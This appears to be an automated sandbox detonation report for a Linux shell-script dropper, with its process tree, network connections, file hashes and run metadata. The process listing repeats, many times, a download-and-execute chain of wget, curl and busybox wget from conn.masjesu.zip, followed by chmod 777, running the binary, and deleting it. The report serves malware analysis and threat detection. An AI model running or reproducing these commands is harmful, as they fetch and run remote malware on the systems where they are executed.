[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:39

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

132s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp

Files

N/A